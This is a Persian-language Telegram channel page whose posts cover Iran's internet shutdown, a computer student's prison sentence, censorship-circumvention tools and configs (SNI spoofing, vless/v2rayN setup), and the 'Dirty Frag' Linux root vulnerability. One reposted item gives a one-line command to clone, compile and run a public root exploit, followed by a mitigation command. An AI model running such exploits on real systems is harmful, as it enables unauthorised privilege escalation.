The Commit
Відкрити в Telegram
توسعه میدیم و توی راه توسعه چالش ها و مشکلات رو به اشتراک میزاریم (: @TheLinuxGP
Показати більше417
Підписники
Немає даних24 години
+17 днів
+330 день
Архів дописів
418
از متد mhr استفاده کنید حتما، روی وب اکثر سایتا رو میتونید لود کنی خودم با تلگرام وب پیام میزارم الان و سرعتش هم خوبه
418
Repost from خبرنامهٔ امیرکبیر
📰 عرفان عربی، دانشجوی مهندسی کامپیوتر، به ۵ سال حبس محکوم شد
بر اساس گزارش اختصاصی رسیده به #خبرنامه_امیرکبیر، عرفان عربی، دانشجوی رشته مهندسی کامپیوتر دانشگاه آزاد بیرجند و از فعالان آزادی اینترنت، به ۵ سال حبس محکوم و این حکم روز جاری در دادگاه انقلاب به صورت شفاهی به وی ابلاغ شد. دادگاه انقلاب، آقای عربی را به اتهاماتی مانند «اجتماع و تبانی» و «تبلیغ علیه نظام» به ۸ سال حبس محکوم کرده که ۵ سال از آن قابل اجرا است. دادگاه همچنین از ابلاغ کتبی حکم خودداری کرده و جزئیات محکومیت تنها به شکل شفاهی به این دانشجو ابلاغ شده است.
عرفان عربی، ۲۰ ساله، دانشجوی کامپیوتر دانشگاه آزاد بیرجند و عضو تیم توسعهٔ سیستمعامل پارچ لینوکس، بهمن ماه سال گذشته پس از احضار توسط وزارت اطلاعات جمهوری اسلامی و ضبط دستگاههای الکترونیکیاش، به اتهاماتی مانند «تبلیغ علیه نظام» و «اجتماع و تبانی برای اقدام علیه امنیت ملی» بازداشت و اواخر فروردین امسال، پس از حدود سه ماه از زندان آزاد شد.
#عرفان_عربی
📰 www.AutNews.org
📱 @AutNews_org
📱 @AutNews_org
📱 @EEAUT
418
Repost from gooyban🦆
بازهم آسیبپذیری تمام لینوکسها از ۲۰۱۷: Dirty Frag
آسیبپذیری تازهای در ادامهی Dirty Pipe و Copy Fail پیدا شده، که با ترکیب دو باگ امنیتی (xfrm-ESP و RxRPC در Page Cache) در بسیاری از توزیعها میتونه دسترسی root بگیره.
میتونید روی سیستم خودتون هم امتحانش کنید:
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
پس از اینکه انجامش دادید، Page Cache شما آلوده شده با اجرای دستور:
echo 3 > /proc/sys/vm/drop_caches
یا ریاستارت کردن سیستم به حالت پیش برگردونیدش.
راهکار:
تا پچ امنیتی برای توزیعتون بیاد میتونید با این دستور ماژولهایی که این آسیبپذیری در اونها وجود داره را غیرفعال کنید و Page cache را پاک کنید:
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
روی این سیستمها تا الان تست شده و آسیبپذیر بودند:
Ubuntu 24.04.4: 6.17.0-23-generic RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64 openSUSE Tumbleweed: 7.0.2-1-default CentOS Stream 10: 6.12.0-224.el10.x86_64 AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64 Fedora 44: 6.19.14-300.fc44.x86_64اگه شبیه CopyFail به نظر میاد خودشون گفتن که:
ایده شروع این تحقیق از آسیبپذیری Copy Fail گرفته شده. بهطور مشخص، بخش xfrm-ESP در زنجیره آسیبپذیری Dirty Frag از همان نقطه ضعف مشابه Copy Fail استفاده میکند. اما تفاوت مهم این است که این آسیبپذیری مستقل از وجود ماژول algif_aead فعال میشود. به عبارت دیگر، حتی اگر روی سیستم راهکار شناختهشده مقابله با Copy Fail (مثل غیرفعال کردن algif_aead) اعمال شده باشد، باز هم لینوکس شما در برابر Dirty Frag آسیبپذیر باقی میماند.⌨️ توضیحات بیشتر در گیتهاب تمام این اتفاقها داره در زمانی میوفته که اینترنت ایران همچنان قطعه، سیستمها به روز نشدند، با خبر شدن از این باگها و برطرف کردنشون به مراتب سختتر خواهد بود. ✈️ به این لیست (از کانال سهراب) Dirty Frag را هم اضافه کنید. 🎮 @gooyban
418
Repost from مثلا ما برنامه نویسیم
🔹یوتیوب دانلودر(با نت ملی)
یک نفر اومده یه حرکت باحال زده با اکشنز گیتهاب اومده یوتیوب دانلودر ساخته
اینم لینک ریپازیتوری خودتون راهنماش بخونید
https://github.com/alitavakoli01/YouTubeDownloader
----
@PythonFarsi2024
418
فک کن بخاطر اینکه پارتی نداری نمیتونی سرور ایران ایپی وایت بخری و به اینترنتی که حق عادیت هست برسی خیلی فشار داره
418
و الان که دسترسی گیت هاب بازه میتونید هم سینماپلاس رو کلون کنید هم DNS Checker که امیدوارم یه کمکی بهتون کرده باشه ( البته اون dns رو تکمیل نکردم )
CinemaPlus:
github.com/MamdMehrabi/CinemaPlus
DNS Checker:
github.com/MamdMehrabi/DNS-Checker
418
برای دور زدن فیلترینگ یوتیوب این روش masterhttp جوابه ولی روی اکانت اصلی گوگلتون نزنید خطرناکه*
همه چیزو توی گیت هاب توضیح داده:
http://github.com/masterking32/MasterHttpRelayVPN
418
Repost from Baraye Azadi | برای آزادی
🟢کانفیگ ادیت شده برای ویندوز (حجم 1 ترابایت):
vless://80c0f29f-850e-4044-a4ee-0b0697d8ca26@127.0.0.1:40443?encryption=none&security=tls&sni=dl1.speedysho.com.&fp=chrome&insecure=0&allowInsecure=0&type=xhttp&host=dl1.speedysho.com&path=dl%3Fed%3D2560&mode=auto&extra=%7B%22downloadSettings%22%3A%7B%22address%22%3A%22127.0.0.1%22%2C%22port%22%3A40443%2C%22network%22%3A%22xhttp%22%2C%22security%22%3A%22tls%22%2C%22tlsSettings%22%3A%7B%22serverName%22%3A%22up1.speedysho.com%22%2C%22fingerprint%22%3A%22chrome%22%7D%2C%22xhttpSettings%22%3A%7B%22path%22%3A%22%2Fdl%3Fed%3D2560%22%2C%22host%22%3A%22up1.speedysho.com%22%2C%22mode%22%3A%22auto%22%7D%7D%7D#%E2%9A%AB%EF%B8%8FBaraye_azadi_bot🟢فایل config.json که خودم دارم استفاده میکنم:
{
"LISTEN_HOST": "0.0.0.0",
"LISTEN_PORT": 40443,
"CONNECT_IP": "104.18.4.130",
"CONNECT_PORT": 443,
"FAKE_SNI": "security.vercel.com"
}418
Repost from Baraye Azadi | برای آزادی
💻 اتصال پرسرعت به کانفیگ با سرور فعال، فعلا نیاز به ویندوز (نیاز به کمی تسلط)
🔴این نرم افزار توسط یکی از فعالان حوزه اینترنت آزاد توسعه داده شده ولی closed source هست و با مسئولیت خودتون استفاده کنید.
✔️برای راه اندازیش یه ویندوز لازمه ولی میتونید به همه دستگاه های متصل به اون wifi اینترنت آزاد بدید.
1️⃣نیاز به یه کانفیگ فعال داره (ترجیحا کلودفلر برای راحتی)
🟢اشتراک های رایگان میتونن از کانفیگ Finland🇫🇮#111 استفاده کنن؛ اشتراک های پریمیوم از کانفیگ VIP🇫🇮#3؛ اگه اشتراک رایگان ندارید میتونید از مینی اپ بگیرید.
2️⃣نیاز به یه آی پی و دومین داریم که وایت شده باشه. الان اونی که توی فایل config.json هست کار میکنه ولی سایت های پشت کلود که باز شدن رو میتونید توی CMD پینگ بگیرید، خودشو IPشو بذارید توی فایل config.json
3️⃣ فایل exe رو run as admin کنید.
4️⃣حالا باید کانفیگ توی v2rayN رو تغییر بدیم به این صورت که توی قسمت آدرس
127.0.0.1 رو میذاریم و توی قسمت port 40443 و تمام، با سرعت عالی میتونید متصل بشید.
⚠️ کانفیگ های من دو بخش داره، بخش xhttp mode توی v2rayN، اون سه نقطه رو بزنید و Address و Port اونجا رو هم ادیت کنید یا کامل پاکش کنید.
🍏 🤖 برای اینکه بقیه دستگاه های توی اون شبکه هم بتونن وصل بشن، توی cmd ویندوز ipconfig رو بزنید تا ipv4 لوکال ویندوز رو پیدا کنید، قسمت Address کانفیگ توی گوشی، اون IP رو وارد کنید و port هم همون 40443
🔖 باید ip و domain توی فایل config.json براتون پینگ بده، توی cmd امتحان کنید.
💵در آخر اگه میتونید دونیت به توسعه دهنده رو در نظر بگیرید.
لینک دانلود داخلی
@Baraye_Azadi_info418
جدیدا روش sni spoofing به عنوان یه روش برای دور زدن فیلترینگ حساب میشه.
حالا این روش چیکار میکنه؟
حمله SNI Spoofing چطور کار میکند؟ در این حمله، مهاجم مستقیماً به اتصال شما با سرور اصلی دستکاری نمیزند (برخلاف MITM سنتی). بلکه دو کار اصلی با آن انجام میشود: 1. فیلترینگ و مسدودسازی (مهمترین کاربرد): فیلترکنندههای اینترنتی (مثل دیوار آتش) رشته متنی داخل SNI را میخوانند. اگر نام سایت در لیست سیاه باشد (مثلاً twitter.com)، اتصال را قطع میکنند. در SNI Spoofing، مهاجم یا کاربر، ابزاری را طوری تنظیم میکند که در مرحله SNI، نام مجاز دیگری (مثل microsoft.com) را اعلام کند، اما در اصل به سرور اصلی (twitter.com) وصل شود. فیلتر که فقط microsoft.com را میبیند، اجازه عبور میدهد. (به این کار SNI Spoofing یا گاهی دور زدن فیلتر میگویند). 2. جعل هویت (کاربرد حملهای): مهاجم میتواند یک سرور جعلی راه بیندازد و در پاسخ به SNI قربانی، خودش را جای سایت اصلی جا بزند. اما این روش به دلیل وجود مکانیزمهای امنیتی مانند گواهی SSL/TLS (که هویت سرور را تأیید میکند) به سختی انجام میشود و مرورگر معمولاً خطای گواهی میدهد.و این روش spoofing چند نوع دیگه هم داره و اینم بگم کلا اسپوف جرم محسوب میشه.
418
۴ تا از سایتای پرکاربرد برنامه نویسی وایت لیست شدن ( گیت هاب کجایی دقیقا کجایییییی )
Let’s Encrypt
https://letsencrypt.org/
Next.js
https://nextjs.org/
SourceForge
https://sourceforge.net/
Vercel
https://vercel.com/
418
کل لست سین بچههایی که عضو چنلن دیگه از ماه گذشته و کارها و شغلایی که این وسط دارن ورشکسته میشن...
418
واقعا دلتنگ سی اس و دوتا شدم بهههه شدتتتتت
( این چند مدت با شبیه ساز لن پلی دادیم ولی انلاین یه چیز دیگه ست )
418
فک کنم وارد هزار ساعت خاموشی شدیم.
دلیل منطقی برای قطعی اینترنت توی این بازه زمانی رو گیر نمیارم.
418
دوستان خبر اینکه پاول دوروف گفته اکانت های ایرانیا که دلیت اکانتشون روی یک ماه هستش رو دلیت نمیزنه فیکه چیزی توی چنلش نزاشته تا الان حداقل!
418
Repost from Stealthy Solutions ™
سال قبل با ۴۰۴ و ارور not found انقدر شوخی کردین که اون همه بلا سرمون اومد
دیگه با ۴۰۵ این مسخره بازیا رو در نیارین لطفاً
Вже доступно! Дослідження Telegram за 2025 — головні інсайти року 
